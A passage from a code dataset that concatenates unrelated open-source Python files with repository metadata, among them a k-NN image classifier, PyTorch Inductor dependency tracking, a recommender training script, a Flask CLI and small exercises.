np.array(train_label).reshape((n_train_data, ))\n\n n_test_data = len(test_img)\n\n imgs = []\n for path, label in zip(test_img, test_label):\n img = cv2.imread(os.path.join(src_path, 'test', label[0], path[0]), 0)\n img = tiny_img(img)\n imgs.append(img)\n\n x_test = np.array(imgs).reshape((n_test_data, -1))\n y_test = np.array(test_label).reshape((n_test_data, ))\n\n print(\"{:^3} | {:^10}\".format(\"K\", \"Test Acc\"))\n print('-' * 15)\n for k in range(1, 30+1):\n test_acc = knn(x_train, y_train, x_test, y_test, k)\n print(\"{:^3} | {:^10}\".format(k, \"%.4f\"%test_acc))\n\n","repo_name":"yu2guang/NCTU-CS","sub_path":"Computer-Vision/HW5-Classifier/tiny_images_with_knn.py","file_name":"tiny_images_with_knn.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41548477518","text":"from vosk import Model, KaldiRecognizer\nimport os\nimport pyaudio\nimport json\n\nimport controller_som\n\nlado_atual = 'direita'\n\nmodel = Model('..\\model')\nrec = KaldiRecognizer(model, 16000)\n\np = pyaudio.PyAudio()\nstream = p.open(format=pyaudio.paInt16, channels=1, rate=16000, input=True, frames_per_buffer=8000)\nstream.start_stream()\na = ''\n\nprint('******************INICIO**********************\\n')\nwhile True:\n data = stream.read(8000) #4000\n '''if len(data) == 0:\n break'''\n if rec.AcceptWaveform(data):\n #a = rec.Result()\n d = json.loads(rec.Result())['text']\n #d['text']\n print(d)\n if len(d) > 0:\n lado_atual = controller_som.controlar(d, lado_atual)\n \n if d in ['encerrado', 'encerrar','encerra','sérra', 'serra']:\n break\n\nprint(rec.FinalResult())","repo_name":"ErikJhones/voice-controller","sub_path":"str/som.py","file_name":"som.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14825740629","text":"import collections\nimport dataclasses\nimport itertools\nimport logging\nimport re\nimport typing\nfrom typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union\n\nimport sympy\n\nimport torch\nfrom torch.fx.experimental.symbolic_shapes import free_unbacked_symbols\n\nfrom .codegen.common import index_prevent_reordering\nfrom .utils import get_dtype_size, sympy_str, sympy_subs, sympy_symbol, VarRanges\nfrom .virtualized import V\n\nlog = logging.getLogger(__name__)\nis_indirect = re.compile(r\"indirect|tmp\").search\nDep = Union[\"MemoryDep\", \"StarDep\", \"WeakDep\"]\n\n\nclass 
MemoryDep(typing.NamedTuple):\n name: str\n index: sympy.Expr # type: ignore[assignment]\n var_names: Tuple[sympy.Symbol, ...]\n size: Tuple[sympy.Expr, ...]\n\n def __repr__(self):\n return f\"MemoryDep({self.name!r}, {self.index}, {self.ranges})\"\n\n @property\n def ranges(self) -> Dict[sympy.Symbol, sympy.Expr]:\n \"\"\"{c0: 128, c1: 512, ...}\"\"\"\n return dict(zip(self.var_names, self.size))\n\n def get_numel(self) -> sympy.Expr:\n if self.is_indirect():\n numel = V.graph.get_numel(self.name)\n else:\n vars = set(self.index.free_symbols)\n numel = sympy.Integer(1)\n for var, size in zip(self.var_names, self.size):\n if var in vars:\n numel = numel * size\n return numel\n\n def rename(self, renames: Dict[str, str]) -> \"MemoryDep\":\n if self.name in renames:\n return MemoryDep(\n renames[self.name], self.index, var_names=self.var_names, size=self.size\n )\n return self\n\n def numbytes_hint(self):\n return V.graph.sizevars.size_hint(self.get_numel()) * get_dtype_size(\n V.graph.get_dtype(self.name)\n )\n\n def has_unbacked_symbols(self):\n return len(free_unbacked_symbols(self.get_numel())) > 0\n\n def is_contiguous(self) -> bool:\n return isinstance(self.index, sympy.Symbol) and self.index in self.var_names\n\n def is_scalar(self) -> bool:\n if isinstance(self.index, sympy.Symbol):\n return self.index not in self.var_names and not self.is_indirect()\n return isinstance(self.index, (int, sympy.Integer))\n\n def is_indirect(self) -> bool:\n return any(is_indirect(v.name) for v in self.index.free_symbols)\n\n\nclass StarDep(typing.NamedTuple):\n # depends on the entire buffer\n name: str\n\n @property\n def index(self):\n raise NotImplementedError(\"StarDep does not have an index\")\n\n def get_numel(self) -> sympy.Expr:\n return V.graph.get_numel(self.name)\n\n def rename(self, renames: Dict[str, str]) -> \"StarDep\":\n if self.name in renames:\n return StarDep(renames[self.name])\n return self\n\n def numbytes_hint(self):\n return V.graph.sizevars.size_hint(self.get_numel()) * get_dtype_size(\n V.graph.get_dtype(self.name)\n )\n\n def has_unbacked_symbols(self):\n return len(free_unbacked_symbols(self.get_numel())) > 0\n\n def is_contiguous(self) -> bool:\n return False\n\n def is_scalar(self) -> bool:\n return False\n\n def is_indirect(self) -> bool:\n return False\n\n\n# Used for tracking mutation ordering\n# if A reads a buffer and B mutates it\n# B must be ordered after A\n#\n# It is weak because if it turns out A's read is never used, we can still\n# eliminate it\nclass WeakDep(typing.NamedTuple):\n name: str\n\n @property\n def index(self):\n raise NotImplementedError(\"WeakDep does not have an index\")\n\n def get_numel(self) -> sympy.Expr:\n return sympy.Integer(1)\n\n def rename(self, renames: Dict[str, str]) -> \"WeakDep\":\n if self.name in renames:\n return WeakDep(renames[self.name])\n return self\n\n def numbytes_hint(self):\n return 1 # Purely inserted for ordering, not an actual dep\n\n def has_unbacked_symbols(self):\n return False\n\n def is_contiguous(self) -> bool:\n return False\n\n\nclass IndexExprDep(typing.NamedTuple):\n index: sympy.Expr # type: ignore[assignment]\n var_names: Tuple[sympy.Symbol, ...]\n size: Tuple[sympy.Expr, ...]\n\n\n@dataclasses.dataclass\nclass ReadWrites:\n reads: Set[Dep]\n writes: Set[Dep]\n index_exprs: Set[IndexExprDep]\n range_vars: Optional[List[sympy.Expr]] = None\n var_ranges: Optional[VarRanges] = None\n op_counts: typing.Counter[str] = dataclasses.field(\n default_factory=collections.Counter\n )\n\n def rename(self, renames: 
typing.Dict[str, str]) -> \"ReadWrites\":\n return ReadWrites(\n {dep.rename(renames) for dep in self.reads},\n {dep.rename(renames) for dep in self.writes},\n self.index_exprs,\n self.range_vars,\n self.var_ranges,\n op_counts=self.op_counts,\n )\n\n def with_read(self, dep: Dep) -> \"ReadWrites\":\n assert isinstance(dep, (WeakDep, StarDep))\n return ReadWrites(\n set.union(self.reads, {dep}),\n self.writes,\n self.index_exprs,\n self.range_vars,\n self.var_ranges,\n op_counts=self.op_counts,\n )\n\n def merge(self, other: \"ReadWrites\"):\n reads = set.union(self.reads, other.reads)\n writes = set.union(self.writes, other.writes)\n index_exprs = set.union(self.index_exprs, other.index_exprs)\n op_counts = collections.Counter(self.op_counts)\n op_counts.update(other.op_counts)\n return ReadWrites(reads - writes, writes, index_exprs, op_counts=op_counts)\n\n @staticmethod\n def merge_list(read_writes: List[\"ReadWrites\"]):\n all_writes = set.union(*[rw.writes for rw in read_writes])\n all_reads = set.union(*[rw.reads for rw in read_writes]) - all_writes\n all_index_exprs = set.union(*[rw.index_exprs for rw in read_writes])\n\n op_counts: typing.Counter[Any] = collections.Counter()\n for rw in read_writes:\n op_counts.update(rw.op_counts)\n\n return ReadWrites(all_reads, all_writes, all_index_exprs, op_counts=op_counts)\n\n def remove_reads(self, rem_reads):\n return ReadWrites(\n self.reads - rem_reads,\n self.writes,\n self.index_exprs,\n self.range_vars,\n self.var_ranges,\n op_counts=self.op_counts,\n )\n\n def reads_and_writes(self):\n return itertools.chain(self.reads, self.writes)\n\n\nclass _RecordLoadStoreInner(V.MockHandler): # type: ignore[name-defined]\n def __init__(self, var_ranges: VarRanges, normalize: bool):\n super().__init__()\n self._reads: Set[MemoryDep] = set()\n self._writes: Set[MemoryDep] = set()\n self._index_exprs: Set[IndexExprDep] = set()\n self._var_ranges: VarRanges = var_ranges\n self._normalize: bool = normalize\n\n def canonicalize(\n self, index: sympy.Expr\n ) -> Tuple[sympy.Expr, Tuple[sympy.Expr, ...]]:\n if not self._normalize:\n sizes = [V.graph.sizevars.simplify(x) for x in self._var_ranges.values()]\n var_names = tuple(\n k for k, v in zip(self._var_ranges.keys(), sizes) if v != 1\n )\n sizes = tuple(v for v in sizes if v != 1)\n return index, var_names, sizes # type: ignore[return-value]\n\n # Try to further simplify the indexes even if simplify_loops didn't\n # convert it to the simplest form because of the interference from\n # different indexing formulas.\n free_symbols = index.free_symbols\n var_ranges = {\n k: V.graph.sizevars.simplify(v)\n for k, v in self._var_ranges.items()\n # TODO(jansel): explore this further normalization\n # if k in free_symbols\n }\n index_vars = [*var_ranges.keys()]\n sizes = [*var_ranges.values()] # type: ignore[assignment]\n new_sizes, reindex, prune = V.graph.sizevars._simplify_loops(\n index_vars,\n sizes,\n index_prevent_reordering([index], index_vars, sizes),\n )\n\n # assign new variables each dimension to deal with numbering mismatches\n # d0, d1, d2 could become d0, d2 -- which won't match d0, d1\n new_vars, add_var = var_builder(canonicalization_prefix())\n replacement = dict(zip(index_vars, reindex([add_var(x) for x in new_sizes])))\n index = sympy_subs(sympy.expand(index), replacement)\n\n new_vars = [*new_vars.keys()]\n new_sizes = [*new_sizes]\n free_symbols = index.free_symbols\n while new_vars and new_vars[-1] not in free_symbols:\n # Reduction has last (reduced) dim in its sizes, but\n # downstream 
users won't. Normalize this away.\n new_vars.pop()\n new_sizes.pop()\n return index, tuple(new_vars), tuple(new_sizes) # type: ignore[return-value]\n\n def load(self, name: str, index: sympy.Expr) -> str:\n self._reads.add(MemoryDep(name, *self.canonicalize(index))) # type: ignore[call-arg]\n return f\"load({name}, {sympy_str(index)})\"\n\n def load_seed(self, name: str, index: int):\n assert isinstance(index, int)\n return self.load(name, sympy.Integer(index))\n\n def store(self, name: str, index: sympy.Expr, value: str, mode=None) -> str:\n self._writes.add(MemoryDep(name, *self.canonicalize(index))) # type: ignore[call-arg]\n return f\"store({name}, {sympy_str(index)}, {value}, {mode})\"\n\n def store_reduction(self, name: str, index, value) -> str:\n return self.store(name, index, f\"store_reduction({value})\")\n\n def index_expr(self, index: sympy.Expr, dtype) -> str:\n self._index_exprs.add(IndexExprDep(*self.canonicalize(index))) # type: ignore[call-arg]\n return f\"index_expr({sympy_str(index)}, {dtype})\"\n\n def bucketize(\n self,\n values,\n offsets_name: str,\n offsets_size: sympy.Expr,\n indexing_dtype: torch.dtype,\n right: bool,\n ):\n self._reads.add(StarDep(offsets_name)) # type: ignore[arg-type]\n return f\"bucketize({values}, {offsets_name}, {sympy_str(offsets_size)}, {indexing_dtype}, {right})\"\n\n\nclass _OpCounter:\n \"\"\"Shim to count how many times each op is used\"\"\"\n\n def __init__(self, inner):\n super().__init__()\n self.parent_handler = inner\n self._op_counts: typing.Counter[Any] = collections.Counter()\n\n def __getattr__(self, name):\n self._op_counts[name] += 1\n return getattr(self.parent_handler, name)\n\n\nclass RecordLoadStore(V.KernelFormatterHandler): # type: ignore[name-defined]\n def __init__(self, var_ranges: VarRanges, normalize: bool):\n parent_handler = _RecordLoadStoreInner(\n var_ranges=var_ranges, normalize=normalize\n )\n parent_handler = _OpCounter(parent_handler)\n super().__init__(parent_handler=parent_handler)\n\n\ndef var_builder(prefix: str) -> Tuple[VarRanges, Callable[[sympy.Expr], sympy.Symbol]]:\n cnt = itertools.count()\n var_ranges: VarRanges = dict()\n\n def add_var(length: sympy.Expr) -> sympy.Symbol:\n v = sympy_symbol(f\"{prefix}{next(cnt)}\")\n var_ranges[v] = length\n return v\n\n return var_ranges, add_var\n\n\ndef index_vars_no_squeeze(*argsizes: Tuple[sympy.Expr, ...], prefix: str):\n var_ranges, add_var = var_builder(prefix)\n args: List[List[sympy.Symbol]] = []\n for size in argsizes:\n args.append(list(map(add_var, size)))\n return args, var_ranges\n\n\ndef index_vars_squeeze(*argsizes: Tuple[sympy.Expr, ...], prefix: str = \"d\"):\n from .ir import SqueezeView\n\n var_ranges, add_var = var_builder(prefix)\n args: List[List[sympy.Expr]] = []\n new_sizes: List[List[sympy.Expr]] = []\n for size in argsizes:\n new_size, reindex = SqueezeView.squeezer(size)\n new_sizes.append(new_size)\n args.append(reindex(list(map(add_var, new_size))))\n return args, var_ranges\n\n\ndef extract_read_writes(\n fn: Callable[..., Any],\n *argsizes: Tuple[sympy.Expr, ...],\n normalize: bool = False,\n prefix: str = \"d\",\n):\n args, var_ranges = index_vars_squeeze(*argsizes, prefix=prefix)\n rw = RecordLoadStore(var_ranges, normalize=normalize)\n with V.set_ops_handler(rw): # type: ignore[call-arg]\n fn(*args)\n\n if normalize:\n range_vars = [] # Number of vars could differ due to normalization\n else:\n range_vars = [*itertools.chain(*args)]\n\n inner = rw.parent_handler.parent_handler\n return ReadWrites(\n set(inner._reads),\n 
set(inner._writes),\n inner._index_exprs,\n range_vars,\n var_ranges,\n rw.parent_handler._op_counts,\n )\n\n\ndef extract_input_node_reduction_ranges( # noqa: F722\n input_node: \".ir.TensorBox\", # type: ignore[valid-type] # noqa: F722\n) -> Tuple[Optional[List[sympy.Expr]], Optional[List[sympy.Expr]]]:\n \"\"\"\n Returns the size and reduction size of all inputs, if the sizes and reduction_sizes (if exist) are all the same.\n It's possible that a node has multiple inputs, some are Reduction nodes and others are Pointwise nodes.\n In this case, reduction_sizes of the Reduction nodes need to be the same.\n Otherwise returns (None, None).\n \"\"\"\n\n from .ir import ComputedBuffer, Loops\n\n if isinstance(input_node.data, ComputedBuffer):\n # Input node has already been realized. Return its size and reduction_size.\n size = input_node.get_size()\n reduction_size = input_node.get_reduction_size()\n if len(reduction_size) > 0:\n return (size, reduction_size)\n else:\n return (None, None)\n\n if not isinstance(input_node.data.data, Loops):\n # Other IRNodes do not have reduction_ranges.\n return (None, None)\n\n # There is one issue: what if there are views / permutations between the input node and its dependent realized nodes?\n # The current method still uses reduction ranges from the dependent realized node, which is not ideal.\n # Is there a way to check whether there are permutations inbetween?\n reads = input_node.get_reads()\n reduction_size = None\n size = None\n for read in reads:\n if not isinstance(read, MemoryDep):\n continue\n buffer = V.graph.get_buffer(read.name)\n if buffer is None:\n continue\n if isinstance(buffer, ComputedBuffer) and len(buffer.get_reduction_size()) > 0:\n if reduction_size is None:\n reduction_size = buffer.get_reduction_size()\n size = buffer.get_size()\n elif (\n reduction_size != buffer.get_reduction_size()\n or size != buffer.get_size()\n ):\n return (None, None)\n return (size, reduction_size)\n\n\ndef canonicalization_prefix():\n return \"c\"\n","repo_name":"pytorch/pytorch","sub_path":"torch/_inductor/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":14799,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"12762330218","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\n##############################\n### CrowdHuman Processing ###\n#############################\n\"\"\"\nimport json\nimport argparse\n\nimport os.path as osp\nfrom tqdm import tqdm\n\nparser = argparse.ArgumentParser(description='Create training txt file for SCUT-HEAD')\nparser.add_argument('--base_dir', help='Path to the root directory of the dataset')\nparser.add_argument('--save_prepend', help='Places where files for detection are saved')\nargs = parser.parse_args()\n\ndef parse_odgt(base_dir, save_prepend, fname):\n out_list = []\n chuman_wh_list = []\n\n with open(osp.join(base_dir, fname), 'r') as odt_f:\n for images in tqdm(odt_f.readlines()):\n s_det = json.loads(images)\n cur_imname = s_det.get('ID') + '.jpg'\n fname = \"#\" + save_prepend + cur_imname\n out_list.append(fname)\n# cur_boxes = [gt_box['hbox'] for gt_box in s_det['gtboxes'] \n# if bool(gt_box.get('head_attr', None))]\n for gt_box in s_det['gtboxes']:\n ignore_label = 0\n is_mask = gt_box.get('tag')\n head_attr = gt_box.get('head_attr', None)\n if not bool(head_attr):\n continue\n if is_mask == 'mask':\n ignore_label = -1\n ignore_cond = head_attr.get('ignore') == 1\n if ignore_cond:\n ignore_label = -1\n 
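# NOTE (editor's annotation): CrowdHuman stores 'hbox' as [x, y, w, h] (top-left corner\n # plus width/height); the lines below convert it to the [x1, y1, x2, y2] corner format\n # written to the detection txt file, e.g. [10, 20, 30, 40] -> (10, 20, 40, 60).\n 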
(startX, startY, W, H) = gt_box['hbox']\n chuman_wh_list.append([W, H])\n endX, endY = startX+W, startY+H\n new_coord = [startX, startY, endX, endY, ignore_label]\n new_line = \" \".join(str(x) for x in new_coord)\n out_list.append(new_line)\n \n return out_list\n\ndef write_out(out_file, lines):\n with open(out_file, 'w+') as of:\n for new_line in tqdm(lines):\n of.write(\"%s\\n\" % new_line)\n\nif __name__ == '__main__':\n im_dir = osp.join(args.base_dir, 'Images')\n train_out = osp.join(args.base_dir, 'CHuman_Train.txt')\n val_out = osp.join(args.base_dir, 'CHuman_Valid.txt')\n train_lines = parse_odgt(args.base_dir, args.save_prepend, 'annotation_train.odgt')\n val_lines = parse_odgt(args.base_dir, args.save_prepend, 'annotation_val.odgt')\n write_out(train_out, train_lines)\n write_out(val_out, val_lines)","repo_name":"Sentient07/HeadHunter","sub_path":"head_detection/data/create_chuman.py","file_name":"create_chuman.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"72"} +{"seq_id":"70287359912","text":"#\n# @lc app=leetcode id=125 lang=python3\n#\n# [125] Valid Palindrome\n#\n\n# @lc code=start\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n sLower = s.lower()\n\n sAlphaNum = \"\"\n for ch in sLower:\n if ch.isalnum():\n sAlphaNum += ch\n\n print(sAlphaNum)\n\n startPtr, endPtr = 0, len(sAlphaNum) - 1\n while endPtr > startPtr:\n # Return early as soon as a non-match is detected\n if sAlphaNum[startPtr] != sAlphaNum[endPtr]:\n return False\n\n startPtr += 1\n endPtr -= 1\n\n return True\n\n\n# @lc code=end\n","repo_name":"MegaBlackLabel/leetcode","sub_path":"125.valid-palindrome.py","file_name":"125.valid-palindrome.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18191708036","text":"import time\nimport torch\nimport numpy as np\nimport argparse\nimport random\nfrom models import PERIS\nfrom metric import cal_measures\nfrom dataloaders.dataloader import DataLoader\n\ntorch.set_num_threads(1)\n\nrandom.seed(2022)\nnp.random.seed(2022)\ntorch.manual_seed(2022)\n\nclass Instructor:\n def __init__(self, opt):\n self.opt = opt \n\n self.data_loader = DataLoader(self.opt) \n\n self.trn_loader, self.vld_loader, self.tst_loader = self.data_loader.get_loaders()\n \n opt.numuser = self.trn_loader.dataset.numuser\n opt.numitem = self.trn_loader.dataset.numitem\n self.model = self.opt.model_class(self.opt).cuda()\n \n self._print_args()\n \n def train(self): \n \n optimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, self.model.parameters()), lr=self.opt.learning_rate, weight_decay=opt.l2reg)\n \n best_score = -1 \n best_topHits, best_topNdcgs = None, None\n batch_loss = 0\n batch_loss_aux = 0\n c = 0 # to check early stopping\n \n for epoch in range(self.opt.num_epoch):\n st = time.time()\n \n for i, batch_data in enumerate(self.trn_loader):\n batch_data = [bd.cuda() for bd in batch_data] \n optimizer.zero_grad() \n\n if epoch < self.opt.warmup_epochs:\n loss = self.model.compute_warmup_loss(batch_data) \n else:\n loss, loss_IS = self.model.compute_loss(batch_data) \n\n loss.backward()\n \n optimizer.step()\n \n batch_loss += loss.data.item()\n \n if epoch>=self.opt.warmup_epochs:\n batch_loss_aux += loss_IS.data.item()\n\n elapsed = time.time() - st\n evalt = time.time()\n \n with torch.no_grad():\n topHits, topNdcgs = cal_measures(self.vld_loader, self.model, opt, 'vld')\n \n 
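# (The block below keeps the best validation score and stops once several
# epochs pass without improvement. A framework-free sketch of that
# patience-based early-stopping pattern; the patience value is illustrative:)
def should_stop(scores, patience=5):
    """Return True once the best score is at least `patience` epochs old."""
    if not scores:
        return False
    best_epoch = max(range(len(scores)), key=scores.__getitem__)
    return (len(scores) - 1) - best_epoch >= patience

assert should_stop([0.1, 0.3, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) is True
assert should_stop([0.1, 0.2, 0.3]) is False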
if (topHits[10] + topNdcgs[10])/2 > best_score:\n best_score = (topHits[10] + topNdcgs[10])/2\n \n best_topHits = topHits\n best_topNdcgs = topNdcgs\n \n c = 0\n \n test_topHits, test_topNdcgs = cal_measures(\n self.tst_loader, self.model, opt, 'tst') \n\n evalt = time.time() - evalt \n \n print(('(%.1fs, %.1fs)\\tEpoch [%d/%d], TRN_ERR : %.4f, TRN_IS_ERR : %.4f, v_score : %5.4f, tHR@10 : %5.4f'% (elapsed, evalt, epoch, self.opt.num_epoch, batch_loss/len(self.trn_loader), batch_loss_aux/len(self.trn_loader), (topHits[10] + topNdcgs[10])/2, test_topHits[10])))\n\n batch_loss = 0\n batch_loss_aux = 0\n\n c += 1\n\n if epoch < self.opt.warmup_epochs:\n c = 0 # don't count patient during warm-up steps \n \n if c > 5: break # Early-stopping\n \n print(('\\nValid score@10 : %5.4f, HR@10 : %5.4f, NDCG@10 : %5.4f\\n'% (((best_topHits[10] + best_topNdcgs[10])/2), best_topHits[10], best_topNdcgs[10])))\n \n return test_topHits, test_topNdcgs\n \n def _print_args(self):\n n_trainable_params, n_nontrainable_params = 0, 0\n for p in self.model.parameters():\n n_params = torch.prod(torch.tensor(p.shape))\n if p.requires_grad:\n n_trainable_params += n_params\n else:\n n_nontrainable_params += n_params\n print('\\nn_trainable_params: {0}, n_nontrainable_params: {1}'.format(n_trainable_params, n_nontrainable_params))\n print('> training arguments:')\n for arg in vars(self.opt):\n print('>>> {0}: {1}'.format(arg, getattr(self.opt, arg)))\n print('')\n\n def run(self, repeats):\n results = []\n rndseed = [19427, 78036, 37498, 87299, 60330] # randomly-generated seeds\n for i in range(repeats):\n print('\\n💫 run: {}/{}'.format(i+1, repeats))\n \n if self.opt.model_name in ['transperis', 'linearperis', 'peris', 'fir']:\n print('\\nWarmup up to {}-th epoch\\n'.format(self.opt.warmup_epochs))\n \n random.seed(rndseed[i]); np.random.seed(rndseed[i]); torch.manual_seed(rndseed[i])\n self._reset_params()\n \n results.append(ins.train())\n \n results = np.array(results)\n \n hrs_mean = np.array([list(i.values()) for i in results[:,0]]).mean(0)\n ndcg_mean = np.array([list(i.values()) for i in results[:,1]]).mean(0)\n \n hrs_std = np.array([list(i.values()) for i in results[:,0]]).mean(0)\n ndcg_std = np.array([list(i.values()) for i in results[:,1]]).mean(0) \n \n print('*TST Performance\\tTop2\\tTop5\\t\\tTop10\\t\\tTop20\\t')\n print('*HR means: {}'.format(', '.join(hrs_mean.astype(str))))\n print('*NDCG means: {}'.format(', '.join(ndcg_mean.astype(str))))\n \n def _reset_params(self):\n self.model = self.opt.model_class(self.opt).cuda()\n \ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\nif __name__ == '__main__': \n parser = argparse.ArgumentParser()\n parser.add_argument('--model_name', default='peris', type=str)\n parser.add_argument('--dataset', default='cell', type=str) \n parser.add_argument('--num_run', default=5, type=int)\n parser.add_argument('--gpu', default=0, type=int)\n parser.add_argument('--num_epoch', default=50, type=int)\n parser.add_argument('--learning_rate', default=1e-2, type=float) \n parser.add_argument('--batch_size', default=128, type=int) \n parser.add_argument('--l2reg', default=0.0, type=float) \n \n parser.add_argument('--margin', default=0.6, type=float) \n parser.add_argument('--K', default=50, type=int) \n parser.add_argument('--numneg', default=5, type=int) \n \n parser.add_argument('--lamb', default=0.2, 
type=float)\n parser.add_argument('--mu', default=0.2, type=float)\n \n parser.add_argument('--binsize', default=8, type=int)\n parser.add_argument('--period', default=64, type=int) \n parser.add_argument('--tau', default=0, type=float)\n parser.add_argument('--bin_ratio', default=0.5, type=float) \n parser.add_argument('--neg_weight', default=1.0, type=float) \n parser.add_argument('--warmup_epochs', default=5, type=int) \n parser.add_argument('--maxhist', default=100, type=int)\n \n opt = parser.parse_args()\n \n torch.cuda.set_device(opt.gpu)\n \n model_classes = { \n 'peris':PERIS, \n } \n \n dataset_path = './data/{}/rec'.format(opt.dataset)\n \n opt.model_class = model_classes[opt.model_name]\n opt.dataset_path = dataset_path\n\n ins = Instructor(opt)\n \n ins.run(opt.num_run) \n","repo_name":"anon-subm/PERIS","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18309293318","text":"\n\nimport html\nfrom pathlib import Path\nimport re\n\ninclude_re = r'()(\\r?\\n)[\\S\\s]*?\\r?\\n()'\n\ndef ansi_to_html(text):\n text = html.escape(text)\n text = (text\n .replace('\u001B[0m', '')\n .replace('\u001B[32m', '')\n .replace('\u001B[35m', '')\n .replace('\u001B[90m', '')\n )\n return text\n\ndef ansi_to_plain(text):\n text = (text\n .replace('\u001B[0m', '')\n .replace('\u001B[32m', '')\n .replace('\u001B[35m', '')\n .replace('\u001B[90m', '')\n )\n return text\n\ndef replace_by_file_html(m: re.Match) -> str:\n file = m.group(2).strip()\n text = Path(file).read_text()\n return m.group(1) + m.group(3) + '
<pre>' + m.group(3) + ansi_to_html(re.sub(r'^[\r\n\s]*\r?\n', '', text.rstrip())) + m.group(3) + '</pre>
    ' + m.group(3) + m.group(4)\n\ndef replace_by_file(m: re.Match) -> str:\n file = m.group(2).strip()\n text = Path(file).read_text()\n return m.group(1) + m.group(3) + '```' + m.group(3) + ansi_to_plain(re.sub(r'^[\\r\\n\\s]*\\r?\\n', '', text.rstrip())) + m.group(3) + '```' + m.group(3) + m.group(4)\n\ndef process_file(filename: 'Path|str'):\n text = Path(filename).read_text()\n text = re.sub(include_re, replace_by_file, text)\n Path(filename).write_text(text)\n\nprocess_file('README.md')\n","repo_name":"doki-nordic/actions-playground","sub_path":"scripts/process_readme.py","file_name":"process_readme.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"75025171111","text":"import random\r\n\r\n#Load words and store them in a list\r\nword_list = []\r\nword_file = open(\"words.txt\")\r\nfor word in word_file:\r\n word_list.append(word.strip())\r\n \r\n#pick a word from the list\r\n#storing the answer in the variable called answer\r\nanswer = random.choice(word_list)\r\nprint(answer)\r\nnum_of_guesses = 0\r\nguess_correctly = False\r\n\r\nwhile num_of_guesses < 3 and not guess_correctly:\r\n guess = str(input(\"What is yor guess: \"))\r\n print(\"Your guess was not correct.\")\r\n print(\"You guessed: {}\".format(guess))\r\n guess = guess.lower()\r\n num_of_guesses += 1\r\n if guess == answer:\r\n guess_correctly = True\r\n else:\r\n guess_correctly = False\r\n \r\nif guess_correctly:\r\n print(\"Congratulations..!! you guessed the right word\")\r\n print(\"It took you {} guesses\".format(num_of_guesses))\r\nelse:\r\n print(\"You used all your choices\")\r\n \r\n\r\n \r\n ","repo_name":"code-lova/BYU-Python-programming","sub_path":"programming_building_blocks/week7/week7_guessinggame.py","file_name":"week7_guessinggame.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25717916376","text":"from datetime import timedelta\nimport time\n\nfrom flask.cli import AppGroup\nfrom flask import current_app\nfrom prometheus_client import push_to_gateway\n\nfrom coalics.models import db\nfrom coalics import tasks, config\nfrom coalics.metrics import push_registry, update_success_time\n\n\ndef init_cli(app):\n\n cli = AppGroup(\"coalics\")\n\n @cli.command(\"init_db\")\n def init_db():\n db.create_all()\n\n @cli.command(\"schedule\")\n def schedule():\n logger = current_app.logger\n td = timedelta(seconds=app.config[\"SOURCE_UPDATE_FREQUENCY\"])\n logger.info(\"Scheduler launching\")\n while True:\n try:\n logger.info(\"Begin schedule run\")\n tasks.update_sources()\n logger.info(\"Scheduler: ran without error\")\n except Exception as e:\n logger.error(\"Scheduler: caught error {}\".format(str(e)), exc_info=True)\n finally:\n logger.info(\"Scheduler: Sleeping for {}s\".format(td.seconds))\n time.sleep(td.seconds)\n\n @cli.command(\"update\")\n def update():\n logger = current_app.logger\n logger.info(\"Begin update run\")\n tasks.update_sources()\n logger.info(\"Update ran without error\")\n\n if config.UPDATE_PUSHGATEWAY is not None:\n push_to_gateway(config.UPDATE_PUSHGATEWAY, \"coalics_update\", push_registry)\n update_success_time.set_to_current_time()\n\n 
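# (For reference, the push pattern used by update() above, spelled out with
# a local registry. The gateway address, job name, and metric name here are
# placeholders, not values taken from the coalics configuration:)
from prometheus_client import CollectorRegistry, Gauge, push_to_gateway

registry = CollectorRegistry()
last_success = Gauge('job_last_success_unixtime',
                     'Last time the batch job completed', registry=registry)
last_success.set_to_current_time()
push_to_gateway('localhost:9091', job='batch_job', registry=registry)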
app.cli.add_command(cli)\n","repo_name":"paulgessinger/coalics","sub_path":"src/coalics/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15205030449","text":"inp_file=file(\"C-small.in\")\r\nout_file=file(\"C-small.out\",\"w\")\r\n\r\ndef solve(line):\r\n line=[int(c1) for c1 in line.split(\" \")]\r\n card_num,indices=line[:2]\r\n line=line[2:]\r\n positions=range(card_num)\r\n result=[0 for c1 in range(card_num)]\r\n c1=1 # pocet umistenych karet\r\n c2=0\r\n while c10:\n confounds_list[inputidx][\"outliermat\"]=confoundmat[:,outlieridx]\n \n #read in --outlierfile inputs if provided, overwriting values from --confoundfile\n if len(outlierfile_list)==num_inputs:\n for inputidx,outlierfile in enumerate(outlierfile_list):\n outliermat=np.loadtxt(outlierfile)>0\n confounds_list[inputidx][\"outliermat\"]\n\n Dt_concat=[]\n for inputidx,inputfile in enumerate(inputnogsr_list):\n confounds_dict=confounds_list[inputidx]\n\n 